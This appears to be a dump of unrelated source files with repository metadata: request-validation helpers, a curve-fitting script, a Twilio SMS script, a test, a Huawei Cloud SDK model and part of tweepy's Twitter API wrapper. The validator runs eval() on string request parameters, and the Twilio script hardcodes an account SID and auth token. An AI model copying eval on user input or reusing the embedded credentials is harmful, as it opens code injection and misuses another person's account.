except Exception as e:
return response_code.REQUEST_PARAM_FORMAT_ERROR
param = json.loads(param_temp)
root = model_json.get('root')
body = model_json.get('body')
root_data = param.get(root)
request_param = None
if root_data:
body_data = root_data.get(body)
if body_data:
if isinstance(body_data,list):
request_param = is_none(root_data)
else:
request_param = is_none(body_data)
if root_data is None:
s_body_data = param.get(body)
if s_body_data:
if isinstance(is_none(s_body_data), dict):
request_param = s_body_data
if isinstance(request_param, list) or request_param is None:
return False
return request_param
except Exception as e:
lg.error(e)
return False
def _json_request(self, request):
"""
处理json请求参数问题
:param request: 请求
:return:
"""
try:
request_data = request.data
req_str = request_data.decode()
if req_str == '':
form_data = request.form
data = {}
for key in form_data:
try:
data[key] = json.loads(form_data[key])
except:
data[key] = form_data[key]
return data
data = json.loads(req_str)
if isinstance(data, list):
return False
return data
except JSONDecodeError as e:
lg.error(e)
return False
def verify_one_param_type(self, param_name, value, type=None):
"""
验证某个参数的类型
:param param_name: 验证的参数名称
:param value: 验证的参数的值
:param type: 验证的参数的类型
:return:
"""
try:
if type == float:
v = None
if isinstance(value,str):
v = eval(value)
if isinstance(value,int):
v = value
if isinstance(value,float):
v = value
if isinstance(v, float):
pass
else:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
if type == int:
v = None
if isinstance(value, str):
v = eval(value)
if isinstance(value, float):
v = value
if isinstance(value, int):
v = value
if isinstance(v, int):
pass
else:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
if type == str:
if isinstance(value, str):
pass
else:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
if type == list:
v = None
if isinstance(value, list):
pass
elif isinstance(value, str):
try:
v = list(value)
except:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
else:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
if type == dict:
if isinstance(value, dict):
pass
elif isinstance(value, str):
try:
v = dict(value)
except:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
else:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
except Exception as e:
lg.error(e)
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_type(param_name, type.__name__)
return code
def verify_one_param_must(self, request_data: dict, param):
"""
验证某个参数是否必填
:param data: 请求的数据
:param param: 本验证的字段
:return:
"""
if request_data.get(param) is None:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_must(param)
return code
else:
pass
def verify_one_param(self, request_data: dict, param):
"""
验证某个参数是否必填
:param data: 请求的数据
:param param: 本验证的字段
:return:
"""
if request_data.get(param) is None:
return True
else:
return False
def verify_param_page(self, data, param):
"""
验证是否有分页信息
:param data: 验证的请求数据
:param param: 是否有page字段
:return:
"""
page_data = data.get(param)
if page_data.get('page_size') is not None:
if page_data.get('current_page') is None:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_must('current_page')
return code
if page_data.get('current_page') is not None:
if page_data.get('page_size') is None:
code = response_code.BAD_REQUEST
code['msg'] = ResponseLog.wrong_param_must('page_size')
return code
def request_process(self, request, xml=None, model_json=None):
"""
请求参数获取
:param request: 请求
:param xml: 请求响应类型 是否是xml 默认是json
:return:
"""
if xml is None:
return self._json_request(request)
if xml == 'xml':
return self._xml_request(request, model_json)
def verify_all_param_must(self, request_data: dict, fields: list):
"""
批量验证是否是必传参数
:param request_data: 请求的参数数据
:param fields: ['a','b']
:return:
"""
for i in fields:
must = self.verify_one_param_must(request_data, i)
if must:
return must
else:
pass
def verify_all_param(self, request_data: dict, fields: dict):
"""
批量验证是否是必传参数
:param request_data: 请求的参数数据
:param fields: ['a','b']
:return:
"""
if type(fields) == tuple:
fields = fields[0]
for i in fields:
must = self.verify_one_param(request_data, i)
if must:
request_data[i] = fields[i]['default']
else:
param_type = self.verify_one_param_type(i, request_data[i], fields[i]['type'])
if param_type:
request_data[i] = fields[i]['default']
return request_data
def verify_all_param_type(self, request_data: dict, fields: dict):
"""
批量验证参数的类型
:param request_data: 请求的参数数据
:param fields: {'a':str,'b':int}
:return:
"""
for k, v in request_data.items():
param_type = self.verify_one_param_type(k, v, fields.get(k))
if param_type:
return param_type
else:
pass
def verify_version(self, version, xml=None):
"""
API版本验证
:param version: 版本信息
:param xml: 是否是xml
:return:
"""
if version == apiVersion.version1.value:
return True, True
else: # 版本信息不存在给的提示
result = response_code.REQUEST_VERSION_ISEXISTENCE
return False, response_result_process(result, xml=xml)
req = requestProcess()
| 31.659375 | 94 | 0.506169 |
4a259356256bf8a59000df1ef418e32d7b8a73ea | 1,308 | py | Python | PythonRearrangement/fittest.py | QuantumQuadrate/Rearrangement | 5f8d64bd18a471a488747ed8d17b00304b4ab293 | [
"MIT"
] | null | null | null | PythonRearrangement/fittest.py | QuantumQuadrate/Rearrangement | 5f8d64bd18a471a488747ed8d17b00304b4ab293 | [
"MIT"
] | 1 | 2019-06-18T23:13:45.000Z | 2019-06-18T23:13:45.000Z | PythonRearrangement/fittest.py | QuantumQuadrate/Rearrangement | 5f8d64bd18a471a488747ed8d17b00304b4ab293 | [
"MIT"
] | 2 | 2019-05-23T15:52:20.000Z | 2021-07-03T15:25:19.000Z | import numpy as np
from scipy.optimize import curve_fit
def getfitparams(fitdata):
"""
Generates fitting parameters to estimate frequencies of the lattice sites from provided values.
fitdata is of the form [(siteNum, fX,fY),...].
"""
def func(X,a,b,c):
x,y = X
return a*x+b*y+c
#Collect our fitting data
xfreqs = []
yfreqs = []
xcoords = []
ycoords = []
#triplet of the form (siteNum, fX, fY)
for triplet in fitdata:
ycoords.append(triplet[0]/11)
xcoords.append(triplet[0]%11)
xfreqs.append(triplet[1])
yfreqs.append(triplet[2])
#Provide initial guesses and get our fit parameters
guessx = 5.,1.,130.
guessy = 1.,5.,130.
fitvalsx = curve_fit(func, (xcoords,ycoords), xfreqs, guessx)[0]
fitvalsy = curve_fit(func, (xcoords,ycoords), yfreqs, guessy)[0]
return fitvalsx,fitvalsy
xa = 5
xb = 1
xc = 130
ya = 1
yb = 5
yc = 130
xs = [ (num%11)*xa+(num/11)*xb+xc+np.random.random() for num in range(121)]
ys = [ (num%11)*ya+(num/11)*yb+yc+np.random.random() for num in range(121)]
ran = np.random.random_integers(0,high=120,size=7).astype(int)
fit = []
for num in ran:
fit.append( (num,xs[num],ys[num]))
print fit
(px,py) = getfitparams(fit)
print px
print py | 23.781818 | 99 | 0.619266 |
4a259805fed00bb05917fa83c33d40a61adeb1a9 | 754 | py | Python | API e JSON/PYTHON_EXE.py | DouglasCarvalhoPereira/Especializaco-Python | 7dface66ef0c86e183e5a5f1a2c9e6f753647d69 | [
"MIT"
] | null | null | null | API e JSON/PYTHON_EXE.py | DouglasCarvalhoPereira/Especializaco-Python | 7dface66ef0c86e183e5a5f1a2c9e6f753647d69 | [
"MIT"
] | null | null | null | API e JSON/PYTHON_EXE.py | DouglasCarvalhoPereira/Especializaco-Python | 7dface66ef0c86e183e5a5f1a2c9e6f753647d69 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# # Python para exe com códigos simples
#
# ### Códigos que não interagem com outros arquivos ou ferramentas do computador
#
# Usaremos abiblioteca pyinstaller
#
# - Passo 1 - Instalar o pyinstaller
# - Passo 2 - Executar o pyinstaller
#
#
# pyinstaller -w nome_do_arquivo.py
# In[ ]:
from twilio.rest import Client
# SID daminha conta TWILIO em twilio.com/console
account_sid = 'ACdfdcabb817fabeca3216cc0e26dd8c92'
#Token de autenticação da minha conta Twilio
auth_token = 'a3d505b7d3af090c2130c5942687211b'
client = Client(account_sid, auth_token)
message = client.messages.create(to='+5524988219104', from_='+12565675179', body='Testando envio de SMS via twilio.')
print(message.sid)
# In[ ]:
| 19.333333 | 117 | 0.742706 |
4a2598f7c1ae94d2f328aa46608d0db4307408ef | 260 | py | Python | test_pair_to_number.py | clean-code-craft-tcq-2/well-named-in-py-Mageshwari-Kannan | 43496100ed66ec94c01100aa391c449ff561fd25 | [
"MIT"
] | null | null | null | test_pair_to_number.py | clean-code-craft-tcq-2/well-named-in-py-Mageshwari-Kannan | 43496100ed66ec94c01100aa391c449ff561fd25 | [
"MIT"
] | null | null | null | test_pair_to_number.py | clean-code-craft-tcq-2/well-named-in-py-Mageshwari-Kannan | 43496100ed66ec94c01100aa391c449ff561fd25 | [
"MIT"
] | null | null | null | from get_pair_number_from_color import get_pair_number_from_color
def test_pair_to_number(major_color, minor_color, expected_pair_number):
pair_number = get_pair_number_from_color(major_color, minor_color)
assert(pair_number == expected_pair_number)
| 43.333333 | 73 | 0.853846 |
4a25992c9138a01d0e5aa601f434d519af07594a | 6,003 | py | Python | huaweicloud-sdk-cloudpipeline/huaweicloudsdkcloudpipeline/v2/model/show_instance_status_response.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | 1 | 2021-11-03T07:54:50.000Z | 2021-11-03T07:54:50.000Z | huaweicloud-sdk-cloudpipeline/huaweicloudsdkcloudpipeline/v2/model/show_instance_status_response.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | huaweicloud-sdk-cloudpipeline/huaweicloudsdkcloudpipeline/v2/model/show_instance_status_response.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
import pprint
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class ShowInstanceStatusResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'task_id': 'str',
'task_status': 'str',
'pipeline_id': 'str',
'pipeline_name': 'str',
'pipeline_url': 'str'
}
attribute_map = {
'task_id': 'task_id',
'task_status': 'task_status',
'pipeline_id': 'pipeline_id',
'pipeline_name': 'pipeline_name',
'pipeline_url': 'pipeline_url'
}
def __init__(self, task_id=None, task_status=None, pipeline_id=None, pipeline_name=None, pipeline_url=None):
"""ShowInstanceStatusResponse - a model defined in huaweicloud sdk"""
super(ShowInstanceStatusResponse, self).__init__()
self._task_id = None
self._task_status = None
self._pipeline_id = None
self._pipeline_name = None
self._pipeline_url = None
self.discriminator = None
if task_id is not None:
self.task_id = task_id
if task_status is not None:
self.task_status = task_status
if pipeline_id is not None:
self.pipeline_id = pipeline_id
if pipeline_name is not None:
self.pipeline_name = pipeline_name
if pipeline_url is not None:
self.pipeline_url = pipeline_url
@property
def task_id(self):
"""Gets the task_id of this ShowInstanceStatusResponse.
实例ID
:return: The task_id of this ShowInstanceStatusResponse.
:rtype: str
"""
return self._task_id
@task_id.setter
def task_id(self, task_id):
"""Sets the task_id of this ShowInstanceStatusResponse.
实例ID
:param task_id: The task_id of this ShowInstanceStatusResponse.
:type: str
"""
self._task_id = task_id
@property
def task_status(self):
"""Gets the task_status of this ShowInstanceStatusResponse.
实例创建状态
:return: The task_status of this ShowInstanceStatusResponse.
:rtype: str
"""
return self._task_status
@task_status.setter
def task_status(self, task_status):
"""Sets the task_status of this ShowInstanceStatusResponse.
实例创建状态
:param task_status: The task_status of this ShowInstanceStatusResponse.
:type: str
"""
self._task_status = task_status
@property
def pipeline_id(self):
"""Gets the pipeline_id of this ShowInstanceStatusResponse.
流水线ID
:return: The pipeline_id of this ShowInstanceStatusResponse.
:rtype: str
"""
return self._pipeline_id
@pipeline_id.setter
def pipeline_id(self, pipeline_id):
"""Sets the pipeline_id of this ShowInstanceStatusResponse.
流水线ID
:param pipeline_id: The pipeline_id of this ShowInstanceStatusResponse.
:type: str
"""
self._pipeline_id = pipeline_id
@property
def pipeline_name(self):
"""Gets the pipeline_name of this ShowInstanceStatusResponse.
流水线名字
:return: The pipeline_name of this ShowInstanceStatusResponse.
:rtype: str
"""
return self._pipeline_name
@pipeline_name.setter
def pipeline_name(self, pipeline_name):
"""Sets the pipeline_name of this ShowInstanceStatusResponse.
流水线名字
:param pipeline_name: The pipeline_name of this ShowInstanceStatusResponse.
:type: str
"""
self._pipeline_name = pipeline_name
@property
def pipeline_url(self):
"""Gets the pipeline_url of this ShowInstanceStatusResponse.
流水线详情页面url
:return: The pipeline_url of this ShowInstanceStatusResponse.
:rtype: str
"""
return self._pipeline_url
@pipeline_url.setter
def pipeline_url(self, pipeline_url):
"""Sets the pipeline_url of this ShowInstanceStatusResponse.
流水线详情页面url
:param pipeline_url: The pipeline_url of this ShowInstanceStatusResponse.
:type: str
"""
self._pipeline_url = pipeline_url
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ShowInstanceStatusResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 27.410959 | 112 | 0.597701 |
4a2599c76ff3c653b200271c81d0b9912d0d81d3 | 57,780 | py | Python | tweepy/api.py | jefigo/tweepy | 8811332fe96f4eaf30b2477641338dd4cbf60631 | [
"MIT"
] | 1 | 2020-10-30T09:15:19.000Z | 2020-10-30T09:15:19.000Z | tweepy/api.py | dsogo/tweepy | 64b42e560a71d3bbcf9cb47f039e158a860eb979 | [
"MIT"
] | null | null | null | tweepy/api.py | dsogo/tweepy | 64b42e560a71d3bbcf9cb47f039e158a860eb979 | [
"MIT"
] | 1 | 2022-01-15T16:04:14.000Z | 2022-01-15T16:04:14.000Z | # Tweepy
# Copyright 2009-2020 Joshua Roesslein
# See LICENSE for details.
import imghdr
import mimetypes
import os
import six
from tweepy.binder import bind_api, pagination
from tweepy.error import TweepError
from tweepy.parsers import ModelParser, Parser
from tweepy.utils import list_to_csv
class API(object):
"""Twitter API"""
def __init__(self, auth_handler=None,
host='api.twitter.com', search_host='search.twitter.com',
upload_host='upload.twitter.com', cache=None, api_root='/1.1',
search_root='', upload_root='/1.1', retry_count=0,
retry_delay=0, retry_errors=None, timeout=60, parser=None,
compression=False, wait_on_rate_limit=False,
wait_on_rate_limit_notify=False, proxy=''):
"""
API instance constructor
:param auth_handler:
:param host: url of the server of the rest api,
default: 'api.twitter.com'
:param search_host: url of the search server,
default: 'search.twitter.com'
:param upload_host: url of the upload server,
default: 'upload.twitter.com'
:param cache: Cache to query if a GET method is used, default: None
:param api_root: suffix of the api version, default: '/1.1'
:param search_root: suffix of the search version, default: ''
:param upload_root: suffix of the upload version, default: '/1.1'
:param retry_count: number of allowed retries, default: 0
:param retry_delay: delay in second between retries, default: 0
:param retry_errors: default: None
:param timeout: delay before to consider the request as timed out in
seconds, default: 60
:param parser: ModelParser instance to parse the responses,
default: None
:param compression: If the response is compressed, default: False
:param wait_on_rate_limit: If the api wait when it hits the rate limit,
default: False
:param wait_on_rate_limit_notify: If the api print a notification when
the rate limit is hit, default: False
:param proxy: Url to use as proxy during the HTTP request, default: ''
:raise TypeError: If the given parser is not a ModelParser instance.
"""
self.auth = auth_handler
self.host = host
self.search_host = search_host
self.upload_host = upload_host
self.api_root = api_root
self.search_root = search_root
self.upload_root = upload_root
self.cache = cache
self.compression = compression
self.retry_count = retry_count
self.retry_delay = retry_delay
self.retry_errors = retry_errors
self.timeout = timeout
self.wait_on_rate_limit = wait_on_rate_limit
self.wait_on_rate_limit_notify = wait_on_rate_limit_notify
self.parser = parser or ModelParser()
self.proxy = {}
if proxy:
self.proxy['https'] = proxy
# Attempt to explain more clearly the parser argument requirements
# https://github.com/tweepy/tweepy/issues/421
parser_type = Parser
if not isinstance(self.parser, parser_type):
raise TypeError(
'"parser" argument has to be an instance of "{required}".'
' It is currently a {actual}.'.format(
required=parser_type.__name__,
actual=type(self.parser)
)
)
@property
def home_timeline(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/timelines/api-reference/get-statuses-home_timeline
:allowed_param: 'since_id', 'max_id', 'count'
"""
return bind_api(
api=self,
path='/statuses/home_timeline.json',
payload_type='status', payload_list=True,
allowed_param=['since_id', 'max_id', 'count'],
require_auth=True
)
def statuses_lookup(self, id_, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-statuses-lookup
:allowed_param: 'id', 'include_entities', 'trim_user', 'map',
'include_ext_alt_text', 'include_card_uri'
"""
if 'map_' in kwargs:
kwargs['map'] = kwargs.pop('map_')
return bind_api(
api=self,
path='/statuses/lookup.json',
payload_type='status', payload_list=True,
allowed_param=['id', 'include_entities', 'trim_user', 'map',
'include_ext_alt_text', 'include_card_uri'],
require_auth=True
)(list_to_csv(id_), *args, **kwargs)
@property
def user_timeline(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/timelines/api-reference/get-statuses-user_timeline
:allowed_param: 'id', 'user_id', 'screen_name', 'since_id',
'max_id', 'count', 'include_rts', 'trim_user',
'exclude_replies'
"""
return bind_api(
api=self,
path='/statuses/user_timeline.json',
payload_type='status', payload_list=True,
allowed_param=['id', 'user_id', 'screen_name', 'since_id',
'max_id', 'count', 'include_rts', 'trim_user',
'exclude_replies']
)
@property
def mentions_timeline(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/timelines/api-reference/get-statuses-mentions_timeline
:allowed_param: 'since_id', 'max_id', 'count'
"""
return bind_api(
api=self,
path='/statuses/mentions_timeline.json',
payload_type='status', payload_list=True,
allowed_param=['since_id', 'max_id', 'count'],
require_auth=True
)
@property
def related_results(self):
""" :reference: https://dev.twitter.com/docs/api/1.1/get/related_results/show/%3id.format
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/related_results/show/{id}.json',
payload_type='relation', payload_list=True,
allowed_param=['id'],
require_auth=False
)
@property
def retweets_of_me(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-statuses-retweets_of_me
:allowed_param: 'since_id', 'max_id', 'count'
"""
return bind_api(
api=self,
path='/statuses/retweets_of_me.json',
payload_type='status', payload_list=True,
allowed_param=['since_id', 'max_id', 'count'],
require_auth=True
)
@property
def get_status(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-statuses-show-id
:allowed_param: 'id', 'trim_user', 'include_my_retweet',
'include_entities', 'include_ext_alt_text',
'include_card_uri'
"""
return bind_api(
api=self,
path='/statuses/show.json',
payload_type='status',
allowed_param=['id', 'trim_user', 'include_my_retweet',
'include_entities', 'include_ext_alt_text',
'include_card_uri']
)
def update_status(self, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-statuses-update
:allowed_param: 'status', 'in_reply_to_status_id',
'auto_populate_reply_metadata',
'exclude_reply_user_ids', 'attachment_url',
'media_ids', 'possibly_sensitive', 'lat', 'long',
'place_id', 'display_coordinates', 'trim_user',
'enable_dmcommands', 'fail_dmcommands', 'card_uri'
"""
if 'media_ids' in kwargs:
kwargs['media_ids'] = list_to_csv(kwargs['media_ids'])
return bind_api(
api=self,
path='/statuses/update.json',
method='POST',
payload_type='status',
allowed_param=['status', 'in_reply_to_status_id',
'auto_populate_reply_metadata',
'exclude_reply_user_ids', 'attachment_url',
'media_ids', 'possibly_sensitive', 'lat', 'long',
'place_id', 'display_coordinates', 'trim_user',
'enable_dmcommands', 'fail_dmcommands',
'card_uri'],
require_auth=True
)(*args, **kwargs)
def media_upload(self, filename, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/media/upload-media/api-reference/post-media-upload
:allowed_param:
"""
f = kwargs.pop('file', None)
file_type = imghdr.what(filename) or mimetypes.guess_type(filename)[0]
if file_type == 'gif':
max_size = 14649
else:
max_size = 4883
headers, post_data = API._pack_image(filename, max_size,
form_field='media', f=f,
file_type=file_type)
kwargs.update({'headers': headers, 'post_data': post_data})
return bind_api(
api=self,
path='/media/upload.json',
method='POST',
payload_type='media',
allowed_param=[],
require_auth=True,
upload_api=True
)(*args, **kwargs)
def create_media_metadata(self, media_id, alt_text, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/media/upload-media/api-reference/post-media-metadata-create
:allowed_param:
"""
kwargs['json_payload'] = {
'media_id': media_id,
'alt_text': {'text': alt_text}
}
return bind_api(
api=self,
path='/media/metadata/create.json',
method='POST',
allowed_param=[],
require_auth=True,
upload_api=True
)(*args, **kwargs)
def update_with_media(self, filename, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-statuses-update_with_media
:allowed_param: 'status', 'possibly_sensitive',
'in_reply_to_status_id',
'in_reply_to_status_id_str',
'auto_populate_reply_metadata', 'lat', 'long',
'place_id', 'display_coordinates'
"""
f = kwargs.pop('file', None)
headers, post_data = API._pack_image(filename, 3072,
form_field='media[]', f=f)
kwargs.update({'headers': headers, 'post_data': post_data})
return bind_api(
api=self,
path='/statuses/update_with_media.json',
method='POST',
payload_type='status',
allowed_param=['status', 'possibly_sensitive',
'in_reply_to_status_id',
'in_reply_to_status_id_str',
'auto_populate_reply_metadata', 'lat', 'long',
'place_id', 'display_coordinates'],
require_auth=True
)(*args, **kwargs)
@property
def destroy_status(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-statuses-destroy-id
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/statuses/destroy/{id}.json',
method='POST',
payload_type='status',
allowed_param=['id'],
require_auth=True
)
@property
def retweet(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-statuses-retweet-id
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/statuses/retweet/{id}.json',
method='POST',
payload_type='status',
allowed_param=['id'],
require_auth=True
)
@property
def unretweet(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/post-statuses-unretweet-id
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/statuses/unretweet/{id}.json',
method='POST',
payload_type='status',
allowed_param=['id'],
require_auth=True
)
@property
def retweets(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-statuses-retweets-id
:allowed_param: 'id', 'count'
"""
return bind_api(
api=self,
path='/statuses/retweets/{id}.json',
payload_type='status', payload_list=True,
allowed_param=['id', 'count'],
require_auth=True
)
@property
def retweeters(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-statuses-retweeters-ids
:allowed_param: 'id', 'cursor', 'stringify_ids
"""
return bind_api(
api=self,
path='/statuses/retweeters/ids.json',
payload_type='ids',
allowed_param=['id', 'cursor', 'stringify_ids']
)
@property
def get_user(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-users-show
:allowed_param: 'id', 'user_id', 'screen_name'
"""
return bind_api(
api=self,
path='/users/show.json',
payload_type='user',
allowed_param=['id', 'user_id', 'screen_name']
)
@property
def get_oembed(self):
""" :reference: https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-statuses-oembed
:allowed_param: 'id', 'url', 'maxwidth', 'hide_media',
'omit_script', 'align', 'related', 'lang'
"""
return bind_api(
api=self,
path='/statuses/oembed.json',
payload_type='json',
allowed_param=['id', 'url', 'maxwidth', 'hide_media',
'omit_script', 'align', 'related', 'lang']
)
def lookup_users(self, user_ids=None, screen_names=None, *args, **kwargs):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-users-lookup
allowed_param= 'user_id', 'screen_name', 'include_entities',
'tweet_mode'
"""
return bind_api(
api=self,
path='/users/lookup.json',
payload_type='user', payload_list=True,
method='POST',
allowed_param=['user_id', 'screen_name', 'include_entities',
'tweet_mode']
)(list_to_csv(user_ids), list_to_csv(screen_names), *args, **kwargs)
def me(self):
""" Get the authenticated user """
return self.get_user(screen_name=self.auth.get_username())
@property
def search_users(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-users-search
:allowed_param: 'q', 'count', 'page'
"""
return bind_api(
api=self,
path='/users/search.json',
payload_type='user', payload_list=True,
require_auth=True,
allowed_param=['q', 'count', 'page']
)
@property
def get_direct_message(self):
""" :reference: https://developer.twitter.com/en/docs/direct-messages/sending-and-receiving/api-reference/get-event
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/direct_messages/events/show.json',
payload_type='direct_message',
allowed_param=['id'],
require_auth=True
)
@property
def list_direct_messages(self):
""" :reference: https://developer.twitter.com/en/docs/direct-messages/sending-and-receiving/api-reference/list-events
:allowed_param: 'count', 'cursor'
"""
return bind_api(
api=self,
path='/direct_messages/events/list.json',
payload_type='direct_message', payload_list=True,
allowed_param=['count', 'cursor'],
require_auth=True
)
def send_direct_message(self, recipient_id, text, quick_reply_type=None,
attachment_type=None, attachment_media_id=None):
"""
Send a direct message to the specified user from the authenticating
user
"""
json_payload = {
'event': {'type': 'message_create',
'message_create': {
'target': {'recipient_id': recipient_id},
'message_data': {'text': text}
}
}
}
message_data = json_payload['event']['message_create']['message_data']
if quick_reply_type is not None:
message_data['quick_reply'] = {'type': quick_reply_type}
if attachment_type is not None and attachment_media_id is not None:
message_data['attachment'] = {'type': attachment_type}
message_data['attachment']['media'] = {'id': attachment_media_id}
return self._send_direct_message(json_payload=json_payload)
@property
def _send_direct_message(self):
""" :reference: https://developer.twitter.com/en/docs/direct-messages/sending-and-receiving/api-reference/new-event
:allowed_param: 'recipient_id', 'text', 'quick_reply_type',
'attachment_type', attachment_media_id'
"""
return bind_api(
api=self,
path='/direct_messages/events/new.json',
method='POST',
payload_type='direct_message',
allowed_param=['recipient_id', 'text', 'quick_reply_type',
'attachment_type', 'attachment_media_id'],
require_auth=True
)
@property
def destroy_direct_message(self):
""" :reference: https://developer.twitter.com/en/docs/direct-messages/sending-and-receiving/api-reference/delete-message-event
:allowed_param: 'id'
"""
return bind_api(
api=self,
path='/direct_messages/events/destroy.json',
method='DELETE',
allowed_param=['id'],
require_auth=True
)
@property
def create_friendship(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/post-friendships-create
:allowed_param: 'id', 'user_id', 'screen_name', 'follow'
"""
return bind_api(
api=self,
path='/friendships/create.json',
method='POST',
payload_type='user',
allowed_param=['id', 'user_id', 'screen_name', 'follow'],
require_auth=True
)
@property
def destroy_friendship(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/post-friendships-destroy
:allowed_param: 'id', 'user_id', 'screen_name'
"""
return bind_api(
api=self,
path='/friendships/destroy.json',
method='POST',
payload_type='user',
allowed_param=['id', 'user_id', 'screen_name'],
require_auth=True
)
@property
def show_friendship(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-friendships-show
:allowed_param: 'source_id', 'source_screen_name', 'target_id',
'target_screen_name'
"""
return bind_api(
api=self,
path='/friendships/show.json',
payload_type='friendship',
allowed_param=['source_id', 'source_screen_name',
'target_id', 'target_screen_name']
)
def lookup_friendships(self, user_ids=None, screen_names=None):
""" Perform bulk look up of friendships from user ID or screenname """
return self._lookup_friendships(list_to_csv(user_ids),
list_to_csv(screen_names))
@property
def _lookup_friendships(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-friendships-lookup
:allowed_param: 'user_id', 'screen_name'
"""
return bind_api(
api=self,
path='/friendships/lookup.json',
payload_type='relationship', payload_list=True,
allowed_param=['user_id', 'screen_name'],
require_auth=True
)
@property
def friends_ids(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-friends-ids
:allowed_param: 'id', 'user_id', 'screen_name', 'cursor'
"""
return bind_api(
api=self,
path='/friends/ids.json',
payload_type='ids',
allowed_param=['id', 'user_id', 'screen_name', 'cursor']
)
@property
def friends(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-friends-list
:allowed_param: 'id', 'user_id', 'screen_name', 'cursor', 'count',
'skip_status', 'include_user_entities'
"""
return bind_api(
api=self,
path='/friends/list.json',
payload_type='user', payload_list=True,
allowed_param=['id', 'user_id', 'screen_name', 'cursor', 'count',
'skip_status', 'include_user_entities']
)
@property
def friendships_incoming(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-friendships-incoming
:allowed_param: 'cursor'
"""
return bind_api(
api=self,
path='/friendships/incoming.json',
payload_type='ids',
allowed_param=['cursor']
)
@property
def friendships_outgoing(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-friendships-outgoing
:allowed_param: 'cursor'
"""
return bind_api(
api=self,
path='/friendships/outgoing.json',
payload_type='ids',
allowed_param=['cursor']
)
@property
def followers_ids(self):
""" :reference: https://developer.twitter.com/en/docs/accounts-and-users/follow-search-get-users/api-reference/get-followers-ids
